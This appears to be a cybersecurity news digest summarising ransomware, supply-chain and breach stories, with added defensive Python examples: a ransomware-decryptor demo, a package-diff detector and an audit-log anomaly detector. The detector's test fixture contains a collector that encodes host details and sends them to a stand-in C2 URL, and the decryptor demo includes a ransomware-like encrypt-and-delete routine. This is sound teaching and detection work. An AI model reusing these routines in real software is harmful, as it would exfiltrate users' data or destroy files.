Daily Brief

Find articles below, see 'DETAILS' for generated summaries

Total articles found: 11540

Checks for new stories every ~15 minutes

2023-09-01 12:15:14 bleepingcomputer MALWARE Free Key Group ransomware decryptor helps victims recover data
Security experts at EclecticIQ have developed a decryption tool for Key Group ransomware. The tool works for versions of the malware built in early August. The ransomware uses a static salt in its encryption scheme, making it possible to reverse. Key Group is a Russian-speaking threat actor that has attacked various organizations and uses private Telegram channels for ransom negotiations. The ransomware appends the .KEYGROUP777TG file extension to every encrypted file and deletes Volume Shadow Copies to prevent system restoration. Users can run the Python decryption script to search for and decrypt files with the .KEYGROUP777TG extension, but should back up their data before doing so. The release of the decryptor may prompt Key Group to improve the security of its ransomware.
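The summary above describes the shape of the decryptor (re-derive the key, find every *.KEYGROUP777TG file, decrypt it, keep a backup). The following is an added illustration of that pattern, not EclecticIQ's script or Key Group's code. It assumes, as the summary implies, that every input to the key derivation is hardcoded in the sample, so the key is reproducible; the salt and secret values, and the HMAC-SHA256 counter-mode stream cipher standing in for the malware's real cipher (the Python standard library has no AES), are constructed for the example.

```python
import hashlib
import hmac
import os
import tempfile
from pathlib import Path

EXT = ".KEYGROUP777TG"  # extension the article says Key Group appends to encrypted files

# Constructed stand-ins for the values a decryptor would lift from the sample.
# Assumption (not stated in the article): both the salt and the secret fed to
# the KDF are fixed in the binary, so every victim ends up with the same key.
STATIC_SALT = b"constructed-static-salt"
STATIC_SECRET = b"constructed-static-secret"


def derive_key(secret: bytes = STATIC_SECRET, salt: bytes = STATIC_SALT) -> bytes:
    """PBKDF2 with fixed inputs is fully deterministic: the 'victim key' is reproducible."""
    return hashlib.pbkdf2_hmac("sha256", secret, salt, 100_000, dklen=32)


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Constructed stream cipher (HMAC-SHA256 in counter mode) used in place of the
    malware's real cipher. XOR is its own inverse, so one function encrypts and decrypts."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        block = hmac.new(key, offset.to_bytes(8, "big"), "sha256").digest()
        out.extend(b ^ k for b, k in zip(data[offset:offset + 32], block))
    return bytes(out)


def encrypt_file(path: Path, key: bytes) -> Path:
    """Mimic the ransomware: write ciphertext under the new extension, remove the original."""
    encrypted = path.with_name(path.name + EXT)
    encrypted.write_bytes(keystream_xor(key, path.read_bytes()))
    path.unlink()
    return encrypted


def decrypt_tree(root: Path, key: bytes) -> list:
    """Walk `root`, decrypt every *.KEYGROUP777TG file next to itself and return the
    restored paths. The encrypted copy is deliberately left in place: if the key
    turns out to be wrong for this build, nothing is lost (the article's backup advice)."""
    restored = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(EXT):
                continue
            enc = Path(dirpath) / name
            plain = enc.with_name(name[:-len(EXT)])
            if plain.exists():
                continue  # never clobber a file that is already there
            plain.write_bytes(keystream_xor(key, enc.read_bytes()))
            restored.append(plain)
    return restored


def demo_roundtrip(content: bytes) -> tuple:
    """Encrypt one file in a scratch directory, run the decryptor over the tree and
    return (restored bytes, whether the encrypted copy still exists)."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = Path(tmp) / "docs" / "report.docx"
        victim.parent.mkdir()
        victim.write_bytes(content)
        enc = encrypt_file(victim, derive_key())
        restored = decrypt_tree(Path(tmp), derive_key())
        return restored[0].read_bytes(), enc.exists()


if __name__ == "__main__":
    print(demo_roundtrip(b"quarterly numbers"))
```

The design point is the first function: when nothing that feeds the KDF varies per victim, "decryption" is just running the same derivation the malware ran, which is why a static salt (together with a static secret) is fatal for a ransomware scheme.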
2023-09-01 12:15:14 bleepingcomputer DATA BREACH LogicMonitor Customers Hacked in Reported Ransomware Attacks
LogicMonitor, a network monitoring company, confirms cyberattacks on some users of its SaaS platform. The hacking campaign has affected a small number of users. Anonymous sources reveal that threat actors hacked customer accounts, created local accounts, and deployed ransomware. Ransomware was deployed using the platform's on-premise LogicMonitor Collector sensors. The attacks targeting LogicMonitor's customers occurred last week. LogicMonitor is investigating technical abnormalities impacting customer accounts. Weak default passwords assigned by LogicMonitor to new users were exploited in the attacks. LogicMonitor is sharing minimal information with users about the incidents.
2023-09-01 12:15:14 bleepingcomputer NATION STATE ACTIVITY North Korean Hackers Behind Malicious VMConnect PyPI Campaign
North Korean state-sponsored hackers are behind a campaign that uploaded malicious packages to the PyPI repository. The packages impersonated popular software projects such as the VMware vSphere connector module vConnector. The campaign is attributed to the Labyrinth Chollima subgroup of North Korean hackers known as Lazarus. The malicious packages featured minimal differences from the originals and contained a malicious function for data collection. Data collected from infected machines is sent to the attacker's command and control servers. The campaign is linked to Lazarus based on evidence such as the payload decoding routine found in the malicious packages. Attribution confidence is high due to similarities with other Lazarus subgroups and the malware they have been associated with.
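Packages that differ from the genuine project by one added function are exactly the case a source-level diff catches. The script below is an added example (not ReversingLabs', PyPI's or vConnector's code) of that check: it parses two copies of a module with Python's ast module and reports imports and functions the suspect copy adds, plus existing functions whose body gained new references. The ORIGINAL and SUSPECT module texts are constructed for the example and only loosely resemble a vSphere connector; the list of modules treated as suspicious (host fingerprinting, encoding, network egress) is the author's own heuristic, not an indicator from the report.

```python
import ast

# Root module names whose first appearance inside a function deserves a look:
# these are the usual building blocks of a collect-and-send routine. Heuristic
# chosen for this example, not an indicator list from the campaign.
SUSPICIOUS_ROOTS = {"socket", "urllib", "requests", "http", "base64",
                    "subprocess", "platform", "getpass", "os", "ctypes"}

# Constructed stand-in for the genuine module.
ORIGINAL = '''
import ssl

class VConnector:
    def __init__(self, host, user, password):
        self.host, self.user, self.password = host, user, password

    def connect(self):
        ctx = ssl.create_default_context()
        return ctx
'''

# Constructed stand-in for the look-alike package: same API, one added collector
# function, and connect() now calls it.
SUSPECT = '''
import ssl
import base64
import platform
import urllib.request

def _collect():
    info = f"{platform.node()}|{platform.platform()}"
    blob = base64.b64encode(info.encode())
    urllib.request.urlopen("http://example.invalid/c2", data=blob)

class VConnector:
    def __init__(self, host, user, password):
        self.host, self.user, self.password = host, user, password

    def connect(self):
        _collect()
        ctx = ssl.create_default_context()
        return ctx
'''


def _root_name(node):
    """platform.node() -> 'platform'; urllib.request.urlopen -> 'urllib'."""
    while isinstance(node, ast.Attribute):
        node = node.value
    return node.id if isinstance(node, ast.Name) else None


def function_refs(source: str) -> dict:
    """Map each function/method name to the set of names its body references.
    Keyed by bare name, so two classes with the same method name would collide."""
    refs = {}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            names = set()
            for sub in ast.walk(node):
                if isinstance(sub, ast.Attribute):
                    root = _root_name(sub)
                    if root:
                        names.add(root)
                elif isinstance(sub, ast.Name):
                    names.add(sub.id)
            refs[node.name] = names
    return refs


def imports(source: str) -> set:
    """Top-level module names imported anywhere in the source."""
    mods = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            mods.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            mods.add(node.module.split(".")[0])
    return mods


def diff_packages(original: str, suspect: str) -> dict:
    """Report what the suspect copy adds relative to the original."""
    orig_refs, sus_refs = function_refs(original), function_refs(suspect)
    findings = {"new_imports": sorted(imports(suspect) - imports(original)),
                "new_functions": {}, "changed_functions": {}}
    for name, names in sus_refs.items():
        if name not in orig_refs:
            # brand-new function: list the suspicious modules it touches
            findings["new_functions"][name] = sorted(names & SUSPICIOUS_ROOTS)
        else:
            grown = sorted(names - orig_refs[name])
            if grown:
                findings["changed_functions"][name] = grown
    return findings


if __name__ == "__main__":
    print(diff_packages(ORIGINAL, SUSPECT))
```

Run against a real pair, feed it the sdist of the package you meant to install and the one you actually got; an unexplained new function that touches platform, base64 and urllib at once is the pattern the summary describes.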
2023-09-01 12:15:14 bleepingcomputer DATA BREACH Forever 21 Data Breach Exposes Personal Information of 500,000 Individuals
Forever 21, a clothing and accessories retailer, suffered a data breach that exposed the personal information of over 500,000 individuals. Hackers had intermittent access to Forever 21 systems between January and March, and stole select files during this time. The breach primarily affected current and former Forever 21 employees, not customers. Forever 21 has taken steps to ensure the stolen data has been erased, indicating potential communication with the attackers. There is no confirmation of a ransomware attack, and the company believes the risk to exposed individuals is low. Impacted individuals will receive instructions on enrolling in a free 12-month fraud and identity theft protection service. This is not the first data breach for Forever 21, as they previously notified customers of a breach in 2017 affecting payment card data from transactions made between March and October.
2023-09-01 12:15:14 bleepingcomputer DATA BREACH Sourcegraph Website Breached Due to Leaked Admin Access Token
The website of the AI-powered coding platform Sourcegraph was breached using a leaked admin access token. The token was accidentally leaked online on July 14th, and an attacker used it on August 28th to create a new site-admin account. The breach was discovered after an increase in API usage was observed by Sourcegraph's security team. The attacker probed Sourcegraph's system by switching account privileges multiple times. Sourcegraph customers' information, including license keys, names, and email addresses, was accessed, but no sensitive data such as private code or passwords was exposed. Sourcegraph took immediate action by deactivating the malicious account, reducing API rate limits, and rotating potentially exposed license keys.
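Two signals in the Sourcegraph summary are cheap to detect from an API audit log: a token suddenly making far more calls than it ever did, and one account having its site-admin flag flipped back and forth. The block below is an added example, not Sourcegraph's code or log format. The log lines are constructed (a key=value format invented for the example, with a steady CI token, a token that bursts to 120 calls in four minutes, and an account whose site-admin flag is toggled four times); the thresholds are arbitrary defaults to tune against your own baseline.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone


def build_sample_log() -> list:
    """Constructed audit log in an invented 'ts key=value ...' format."""
    t0 = datetime(2023, 8, 28, 9, 0, tzinfo=timezone.utc)
    lines = []
    # Normal traffic: a CI token polling every ten minutes for an hour.
    for i in range(6):
        ts = (t0 + timedelta(minutes=10 * i)).isoformat()
        lines.append(f"{ts} token=tok_ci actor=ci action=graphql_query")
    # Burst: a leaked token used 120 times in four minutes.
    for i in range(120):
        ts = (t0 + timedelta(hours=1, seconds=2 * i)).isoformat()
        lines.append(f"{ts} token=tok_leaked actor=svc_admin action=graphql_query")
    # Probing: the newly created account has site-admin toggled four times.
    for i, value in enumerate(["true", "false", "true", "false"]):
        ts = (t0 + timedelta(hours=1, minutes=10 + i)).isoformat()
        lines.append(f"{ts} token=tok_leaked actor=svc_admin "
                     f"action=set_user_site_admin target=newadmin value={value}")
    return lines


def parse(line: str) -> dict:
    """Split 'ts k=v k=v' into a dict with a parsed datetime under 'ts'."""
    ts, *pairs = line.split()
    event = dict(pair.split("=", 1) for pair in pairs)
    event["ts"] = datetime.fromisoformat(ts)
    return event


def max_in_window(times: list, window: timedelta) -> int:
    """Largest number of timestamps falling inside any sliding window."""
    best, recent = 0, deque()
    for t in sorted(times):
        recent.append(t)
        while t - recent[0] > window:
            recent.popleft()
        best = max(best, len(recent))
    return best


def detect(lines: list, burst_window=timedelta(minutes=5), burst_threshold=50,
           flip_window=timedelta(minutes=30), min_flips=3) -> list:
    """Return (rule, subject, count) findings for token bursts and admin flag flips."""
    events = [parse(line) for line in lines]
    by_token, flips = defaultdict(list), defaultdict(list)
    for ev in events:
        by_token[ev["token"]].append(ev["ts"])
        if ev.get("action") == "set_user_site_admin":
            flips[ev["target"]].append(ev["ts"])
    findings = []
    for token, times in sorted(by_token.items()):
        n = max_in_window(times, burst_window)
        if n >= burst_threshold:
            findings.append(("token_burst", token, n))
    for target, times in sorted(flips.items()):
        n = max_in_window(times, flip_window)
        if n >= min_flips:
            findings.append(("site_admin_flips", target, n))
    return findings


if __name__ == "__main__":
    for finding in detect(build_sample_log()):
        print(finding)
```

The burst rule is what surfaced the real incident (an unexplained jump in API usage); the flip rule targets the privilege-switching probe described above, which a pure volume threshold would miss because it takes only a handful of requests. Rate limiting, the mitigation Sourcegraph applied, caps the damage of the first but does nothing about the second, which is why the admin-flag audit event deserves its own alert.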